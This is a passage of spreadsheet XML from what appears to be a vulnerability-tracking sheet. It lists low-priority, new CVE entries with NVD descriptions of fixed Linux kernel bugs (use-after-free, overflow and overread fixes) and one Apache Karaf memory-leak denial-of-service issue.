          <t>CVE-2026-90431</t>
        </is>
      </c>
      <c r="D799" s="5" t="inlineStr"/>
      <c r="E799" s="5" t="inlineStr"/>
      <c r="F799" s="5" t="inlineStr"/>
      <c r="G799" s="5" t="inlineStr"/>
      <c r="H799" s="5" t="inlineStr"/>
      <c r="I799" s="5" t="inlineStr"/>
      <c r="J799" s="5" t="inlineStr"/>
      <c r="K799" s="5" t="inlineStr"/>
      <c r="L799" s="5" t="inlineStr"/>
      <c r="M799" s="5" t="inlineStr"/>
      <c r="N799" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O799" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P799" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q799" s="5" t="inlineStr"/>
      <c r="R799" s="5" t="inlineStr"/>
      <c r="S799" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
remoteproc: Prevent crash handling to race with rproc_del()
There's no synchronization between rproc_crash_handler_work() and
rproc_del(), as such it's possible for a driver to be removed while
crash-handler work is scheduled, or even executing - resulting in
use-after-free issues.
To avoid this the scheduled work need to be cancelled and synchronized
against before the removal proceeds.
In order to ensure that this doesn't race with the reporting, and
thereby scheduling new work, a "deleting" flag is introduced. This is
similar to the RPROC_DELETE state that was introduced to ensure that
"start" didn't race with rproc_del(), but the existing mechanism can not
be used as it's valid to call rproc_report_crash() in atomic context -
and the "state" is protected by a mutex.
In the event that work is cancelled the pm_stay_awake() is left
unbalanced and need to be unrolled.
The blocking and cancelling of crash-handler work prior to the actual
rproc_shutdown() call does have the explicit side-effect that crashes
resulting from the shutdown process will not enter the crash-handling
path, and as such will not generate devcoredumps etc. Due to the
existing mutual exclusion between these code paths there's no concrete
reduction in functionality, but further work would be needed to handle
this case.</t>
        </is>
      </c>
      <c r="T799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90431</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B800" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90432</t>
        </is>
      </c>
      <c r="D800" s="5" t="inlineStr"/>
      <c r="E800" s="5" t="inlineStr"/>
      <c r="F800" s="5" t="inlineStr"/>
      <c r="G800" s="5" t="inlineStr"/>
      <c r="H800" s="5" t="inlineStr"/>
      <c r="I800" s="5" t="inlineStr"/>
      <c r="J800" s="5" t="inlineStr"/>
      <c r="K800" s="5" t="inlineStr"/>
      <c r="L800" s="5" t="inlineStr"/>
      <c r="M800" s="5" t="inlineStr"/>
      <c r="N800" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O800" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P800" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q800" s="5" t="inlineStr"/>
      <c r="R800" s="5" t="inlineStr"/>
      <c r="S800" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched_ext: Abort directly from the hardlockup handler
scx_hardlockup() defers the abort to an irq_work because exit claiming used
to take scx_sched_lock and couldn't run from NMI. The deferral is now
unnecessary - claiming is NMI-safe and asserting -&gt;aborting is exactly what
breaks the live-locks that hard-lock CPUs. Call handle_lockup() directly and
drop the irq_work. This also makes the self-detected case recoverable: the
perf watchdog fires on the hard-locked CPU itself, where a queued irq_work
never runs with IRQs off.
Also fix the return value: %true used to be returned whenever sched_ext was
loaded, suppressing the kernel's hardlockup report even when the abort was
refused. Return %true only when this call initiated the abort.</t>
        </is>
      </c>
      <c r="T800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90432</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B801" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90433</t>
        </is>
      </c>
      <c r="D801" s="5" t="inlineStr"/>
      <c r="E801" s="5" t="inlineStr"/>
      <c r="F801" s="5" t="inlineStr"/>
      <c r="G801" s="5" t="inlineStr"/>
      <c r="H801" s="5" t="inlineStr"/>
      <c r="I801" s="5" t="inlineStr"/>
      <c r="J801" s="5" t="inlineStr"/>
      <c r="K801" s="5" t="inlineStr"/>
      <c r="L801" s="5" t="inlineStr"/>
      <c r="M801" s="5" t="inlineStr"/>
      <c r="N801" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O801" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P801" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q801" s="5" t="inlineStr"/>
      <c r="R801" s="5" t="inlineStr"/>
      <c r="S801" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
spi: oc-tiny: switch to managed controller allocation
The controller is allocated with the non-managed spi_alloc_host() while
the interrupt is registered with devm_request_irq().  During removal,
spi_bitbang_stop() only unregisters the controller; the subsequent
spi_controller_put() then frees the controller together with its
embedded driver-private devdata, which is the IRQ handler's dev_id.  The
devm_request_irq() release action (free_irq()), which drains the
handler, does not run until after .remove() returns.  A late or latched
interrupt can therefore reach tiny_spi_irq() and dereference
already-freed memory (e.g. hw-&gt;base).
Switch to devm_spi_alloc_host() so that the devres LIFO order releases
the controller only after free_irq() has drained the handler, and drop
the now-redundant spi_controller_put() from .remove().  The probe error
path is simplified to direct returns.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="T801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90433</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B802" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90434</t>
        </is>
      </c>
      <c r="D802" s="5" t="inlineStr"/>
      <c r="E802" s="5" t="inlineStr"/>
      <c r="F802" s="5" t="inlineStr"/>
      <c r="G802" s="5" t="inlineStr"/>
      <c r="H802" s="5" t="inlineStr"/>
      <c r="I802" s="5" t="inlineStr"/>
      <c r="J802" s="5" t="inlineStr"/>
      <c r="K802" s="5" t="inlineStr"/>
      <c r="L802" s="5" t="inlineStr"/>
      <c r="M802" s="5" t="inlineStr"/>
      <c r="N802" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O802" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P802" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q802" s="5" t="inlineStr"/>
      <c r="R802" s="5" t="inlineStr"/>
      <c r="S802" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
isofs: release zisofs block pointer buffer head
zisofs_fill_pages() reads the compressed block pointer table.  The error
paths release the current buffer_head, the loop also releases the old
buffer_head when it advances. However, the success path leaves the last
buffer_head referenced. Release it before returning success.</t>
        </is>
      </c>
      <c r="T802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90434</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B803" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90435</t>
        </is>
      </c>
      <c r="D803" s="5" t="inlineStr"/>
      <c r="E803" s="5" t="inlineStr"/>
      <c r="F803" s="5" t="inlineStr"/>
      <c r="G803" s="5" t="inlineStr"/>
      <c r="H803" s="5" t="inlineStr"/>
      <c r="I803" s="5" t="inlineStr"/>
      <c r="J803" s="5" t="inlineStr"/>
      <c r="K803" s="5" t="inlineStr"/>
      <c r="L803" s="5" t="inlineStr"/>
      <c r="M803" s="5" t="inlineStr"/>
      <c r="N803" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O803" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P803" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q803" s="5" t="inlineStr"/>
      <c r="R803" s="5" t="inlineStr"/>
      <c r="S803" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/mlx5: Fix integer overflow of user QP buffer size
set_user_buf_size() computes the QP buffer size by left-shifting the
user-supplied rq.wqe_cnt and rq.wqe_shift values as signed integers.
A sufficiently large rq.wqe_cnt causes signed integer overflow, which
is undefined behavior, and yields a small or negative buf_size, causing
ib_umem_get() to map a buffer smaller than the hardware will actually
write into.
Replace the shifts and addition with check_shl_overflow() and
check_add_overflow(), rejecting invalid user inputs.
Moreover, guard the identical shift computing qp-&gt;sq.offset in
_create_user_qp() before set_user_buf_size() is reached.</t>
        </is>
      </c>
      <c r="T803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90435</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B804" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92230</t>
        </is>
      </c>
      <c r="D804" s="5" t="inlineStr"/>
      <c r="E804" s="5" t="inlineStr"/>
      <c r="F804" s="5" t="inlineStr"/>
      <c r="G804" s="5" t="inlineStr"/>
      <c r="H804" s="5" t="inlineStr"/>
      <c r="I804" s="5" t="inlineStr"/>
      <c r="J804" s="5" t="inlineStr"/>
      <c r="K804" s="5" t="inlineStr"/>
      <c r="L804" s="5" t="inlineStr"/>
      <c r="M804" s="5" t="inlineStr"/>
      <c r="N804" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O804" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P804" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q804" s="5" t="inlineStr"/>
      <c r="R804" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-772</t>
        </is>
      </c>
      <c r="S804" s="5" t="inlineStr">
        <is>
          <t>Apache Karaf's XmlUtils cached XML parser/transformer factories in static ThreadLocal fields on long-lived container threads. Because a ThreadLocal value outlives the OSGi bundle that created it, repeated bundle or feature install, update, or refresh operations can leave successive bundle ClassLoader's pinned in memory and unreachable for garbage collection, leading to unbounded Metaspace growth and eventual denial of service of the Karaf instance.</t>
        </is>
      </c>
      <c r="T804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92230</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B805" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92476</t>
        </is>
      </c>
      <c r="D805" s="5" t="inlineStr"/>
      <c r="E805" s="5" t="inlineStr"/>
      <c r="F805" s="5" t="inlineStr"/>
      <c r="G805" s="5" t="inlineStr"/>
      <c r="H805" s="5" t="inlineStr"/>
      <c r="I805" s="5" t="inlineStr"/>
      <c r="J805" s="5" t="inlineStr"/>
      <c r="K805" s="5" t="inlineStr"/>
      <c r="L805" s="5" t="inlineStr"/>
      <c r="M805" s="5" t="inlineStr"/>
      <c r="N805" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O805" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P805" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q805" s="5" t="inlineStr"/>
      <c r="R805" s="5" t="inlineStr"/>
      <c r="S805" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: keembay - Initialize completion before requesting IRQ
kmb_ocs_aes_probe() requests the device IRQ before initializing
irq_completion. Once the handler is registered it can run immediately,
and ocs_aes_irq_handler() unconditionally calls complete(). An
interrupt in this window would therefore use an uninitialized
completion.
Initialize the completion before requesting the IRQ, as the sibling
OCS HCU and ECC drivers already do.</t>
        </is>
      </c>
      <c r="T805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92476</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B806" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92477</t>
        </is>
      </c>
      <c r="D806" s="5" t="inlineStr"/>
      <c r="E806" s="5" t="inlineStr"/>
      <c r="F806" s="5" t="inlineStr"/>
      <c r="G806" s="5" t="inlineStr"/>
      <c r="H806" s="5" t="inlineStr"/>
      <c r="I806" s="5" t="inlineStr"/>
      <c r="J806" s="5" t="inlineStr"/>
      <c r="K806" s="5" t="inlineStr"/>
      <c r="L806" s="5" t="inlineStr"/>
      <c r="M806" s="5" t="inlineStr"/>
      <c r="N806" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O806" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P806" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q806" s="5" t="inlineStr"/>
      <c r="R806" s="5" t="inlineStr"/>
      <c r="S806" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: ufs: debugfs: Reserve space for a string terminator
ufs_saved_err_write() copies user input into a zero-initialized stack
buffer and passes it to kstrtoint(). A write that fills the entire buffer
overwrites its only terminator.
Reject an input whose length leaves no room for the trailing NUL.</t>
        </is>
      </c>
      <c r="T806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92477</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B807" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92478</t>
        </is>
      </c>
      <c r="D807" s="5" t="inlineStr"/>
      <c r="E807" s="5" t="inlineStr"/>
      <c r="F807" s="5" t="inlineStr"/>
      <c r="G807" s="5" t="inlineStr"/>
      <c r="H807" s="5" t="inlineStr"/>
      <c r="I807" s="5" t="inlineStr"/>
      <c r="J807" s="5" t="inlineStr"/>
      <c r="K807" s="5" t="inlineStr"/>
      <c r="L807" s="5" t="inlineStr"/>
      <c r="M807" s="5" t="inlineStr"/>
      <c r="N807" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O807" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P807" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q807" s="5" t="inlineStr"/>
      <c r="R807" s="5" t="inlineStr"/>
      <c r="S807" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: ufs: core: Validate connected lane counts
The connected lane count is used by TX equalization code to index arrays
sized by UFS_MAX_LANES. Reject zero and out-of-range RX or TX lane counts
before they can be propagated.</t>
        </is>
      </c>
      <c r="T807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92478</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B808" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92479</t>
        </is>
      </c>
      <c r="D808" s="5" t="inlineStr"/>
      <c r="E808" s="5" t="inlineStr"/>
      <c r="F808" s="5" t="inlineStr"/>
      <c r="G808" s="5" t="inlineStr"/>
      <c r="H808" s="5" t="inlineStr"/>
      <c r="I808" s="5" t="inlineStr"/>
      <c r="J808" s="5" t="inlineStr"/>
      <c r="K808" s="5" t="inlineStr"/>
      <c r="L808" s="5" t="inlineStr"/>
      <c r="M808" s="5" t="inlineStr"/>
      <c r="N808" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O808" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P808" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q808" s="5" t="inlineStr"/>
      <c r="R808" s="5" t="inlineStr"/>
      <c r="S808" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: ufs: Avoid NULL CQE dereference when reporting invalid tags
The single-doorbell completion path can call ufshcd_compl_one_cqe() with a
NULL CQE. If no command is associated with the completion tag, the warning
message dereferences the CQE while reporting the error.  Avoid that
dereference and include the invalid tag in the warning.</t>
        </is>
      </c>
      <c r="T808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92479</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B809" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92480</t>
        </is>
      </c>
      <c r="D809" s="5" t="inlineStr"/>
      <c r="E809" s="5" t="inlineStr"/>
      <c r="F809" s="5" t="inlineStr"/>
      <c r="G809" s="5" t="inlineStr"/>
      <c r="H809" s="5" t="inlineStr"/>
      <c r="I809" s="5" t="inlineStr"/>
      <c r="J809" s="5" t="inlineStr"/>
      <c r="K809" s="5" t="inlineStr"/>
      <c r="L809" s="5" t="inlineStr"/>
      <c r="M809" s="5" t="inlineStr"/>
      <c r="N809" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O809" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P809" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q809" s="5" t="inlineStr"/>
      <c r="R809" s="5" t="inlineStr"/>
      <c r="S809" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: ufs: core: Validate string descriptors
The string descriptor length includes a two-byte header while the UTF-16
payload starts after it. utf16s_to_utf8s() expects a count of UTF-16 code
units, not bytes. Passing the payload byte count can make it read beyond
the descriptor buffer.
Validate that the payload has an even byte count, pass a code-unit count to
the converter, and allocate sufficient UTF-8 output space.
The raw string buffer starts after the descriptor header but its size is
bLength. Copying bLength bytes from that pointer can read beyond the
response buffer.
Allocate a zeroed bLength-sized buffer and copy only the UTF-16
payload. This preserves the raw buffer size consumed by the RPMB device-ID
ABI while avoiding the overread.</t>
        </is>
      </c>
      <c r="T809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92480</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B810" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92481</t>
        </is>
      </c>
      <c r="D810" s="5" t="inlineStr"/>
      <c r="E810" s="5" t="inlineStr"/>
      <c r="F810" s="5" t="inlineStr"/>
      <c r="G810" s="5" t="inlineStr"/>
      <c r="H810" s="5" t="inlineStr"/>
      <c r="I810" s="5" t="inlineStr"/>
      <c r="J810" s="5" t="inlineStr"/>
      <c r="K810" s="5" t="inlineStr"/>
      <c r="L810" s="5" t="inlineStr"/>
      <c r="M810" s="5" t="inlineStr"/>
      <c r="N810" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O810" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P810" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q810" s="5" t="inlineStr"/>
      <c r="R810" s="5" t="inlineStr"/>
      <c r="S810" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
pinctrl: mediatek: free EINT resources on unbind
mtk_eint_do_init() creates an IRQ domain, populates it with a mapping for
every EINT line and installs a chained handler on the parent interrupt,
but none of these are ever released. This was harmless while the drivers
were built-in, but now that they can be built as modules and
unbound/rmmod'd it leaves behind a dangling IRQ domain, interrupt mappings
whose chip data points at freed memory, and a chained handler that keeps
firing into that freed data.
The plain allocations in mtk_eint_do_init() already use the device-managed
devm_*() helpers, so tear the remaining resources down the same way:
register a devm action that detaches the chained handler, waits for any
in-flight handler to finish, disposes of the per-line mappings and removes
the IRQ domain. This mirrors the device-managed lifecycle adopted for the
GPIO chip and keeps the whole EINT setup self-cleaning on unbind.</t>
        </is>
      </c>
      <c r="T810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92481</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B811" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92482</t>
        </is>
      </c>
      <c r="D811" s="5" t="inlineStr"/>
      <c r="E811" s="5" t="inlineStr"/>
      <c r="F811" s="5" t="inlineStr"/>
      <c r="G811" s="5" t="inlineStr"/>
      <c r="H811" s="5" t="inlineStr"/>
      <c r="I811" s="5" t="inlineStr"/>
      <c r="J811" s="5" t="inlineStr"/>
      <c r="K811" s="5" t="inlineStr"/>
      <c r="L811" s="5" t="inlineStr"/>
      <c r="M811" s="5" t="inlineStr"/>
      <c r="N811" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O811" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P811" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q811" s="5" t="inlineStr"/>
      <c r="R811" s="5" t="inlineStr"/>
      <c r="S811" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
pinctrl: mediatek: use devm_gpiochip_add_data() for GPIO chip
The gpio_chip is allocated with device-managed memory but registered with
the non-managed gpiochip_add_data(). This was harmless while the drivers
were built-in, but once they can be built as modules and unbound/rmmod'd,
devm frees the gpio_chip's memory while it is still registered, causing a
use-after-free.
Register it with devm_gpiochip_add_data() so it shares the same
device-managed lifecycle, which also lets the manual gpiochip_remove()
error paths go away.</t>
        </is>
      </c>
      <c r="T811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92482</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B812" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92483</t>
        </is>
      </c>
      <c r="D812" s="5" t="inlineStr"/>
      <c r="E812" s="5" t="inlineStr"/>
      <c r="F812" s="5" t="inlineStr"/>
      <c r="G812" s="5" t="inlineStr"/>
      <c r="H812" s="5" t="inlineStr"/>
      <c r="I812" s="5" t="inlineStr"/>
      <c r="J812" s="5" t="inlineStr"/>
      <c r="K812" s="5" t="inlineStr"/>
      <c r="L812" s="5" t="inlineStr"/>
      <c r="M812" s="5" t="inlineStr"/>
      <c r="N812" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O812" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P812" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q812" s="5" t="inlineStr"/>
      <c r="R812" s="5" t="inlineStr"/>
      <c r="S812" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
liveupdate: Remember FLB retrieve() status
LUO keeps track of successful retrieve attempts on an FLB. It does so
to avoid multiple retrievals of the same FLB. Multiple retrievals cause
problems because once the FLB is retrieved, the serialized data
structures are likely freed and the FLB is likely in a very different
state from what the code expects.
All this works well when retrieve succeeds. When it fails,
luo_flb_retrieve_one() returns the error immediately, without ever
storing anywhere that a retrieve was attempted or what its error code
was. If the user attempts to retrieve another file registered with the
same FLB, LUO will attempt to call the FLB's retrieve() callback again.
The retry is problematic for much of the same reasons listed above. The
FLB is likely in a very different state than what the retrieve logic
normally expects (e.g. some KHO pages may have already been restored and
freed).
There is no sane way of attempting the retrieve again. Remember the
error retrieve returned and directly return it on a retry.
This is done by changing the retrieved bool to a retrieve_status
integer. A value of 0 means retrieve was never attempted, a positive
value means it succeeded, and a negative value means it failed and the
error code is the value.
This is similar to commit f85b1c6af5bc ("liveupdate: luo_file: remember
retrieve() status") which did the same for LUO files.</t>
        </is>
      </c>
      <c r="T812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92483</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B813" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92484</t>
        </is>
      </c>
      <c r="D813" s="5" t="inlineStr"/>
      <c r="E813" s="5" t="inlineStr"/>
      <c r="F813" s="5" t="inlineStr"/>
      <c r="G813" s="5" t="inlineStr"/>
      <c r="H813" s="5" t="inlineStr"/>
      <c r="I813" s="5" t="inlineStr"/>
      <c r="J813" s="5" t="inlineStr"/>
      <c r="K813" s="5" t="inlineStr"/>
      <c r="L813" s="5" t="inlineStr"/>
      <c r="M813" s="5" t="inlineStr"/>
      <c r="N813" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O813" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P813" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q813" s="5" t="inlineStr"/>
      <c r="R813" s="5" t="inlineStr"/>
      <c r="S813" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/region: Fix use-after-free in find_pos_and_ways() error path
The error path releases its reference to a switch decoder before
logging an error that includes the decoder name. If the released
reference is the last one, the decoder can be freed before the error
message accesses its name.
Drop the reference after the error is reported.</t>
        </is>
      </c>
      <c r="T813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92484</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B814" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92485</t>
        </is>
      </c>
      <c r="D814" s="5" t="inlineStr"/>
      <c r="E814" s="5" t="inlineStr"/>
      <c r="F814" s="5" t="inlineStr"/>
      <c r="G814" s="5" t="inlineStr"/>
      <c r="H814" s="5" t="inlineStr"/>
      <c r="I814" s="5" t="inlineStr"/>
      <c r="J814" s="5" t="inlineStr"/>
      <c r="K814" s="5" t="inlineStr"/>
      <c r="L814" s="5" t="inlineStr"/>
      <c r="M814" s="5" t="inlineStr"/>
      <c r="N814" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O814" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P814" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q814" s="5" t="inlineStr"/>
      <c r="R814" s="5" t="inlineStr"/>
      <c r="S814" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix WARNING in bpf_tracing_link_release
The trampoline could be corrupted by the blindly
'tr-&gt;flags = BPF_TRAMP_F_TAIL_CALL_CTX' in verifier.
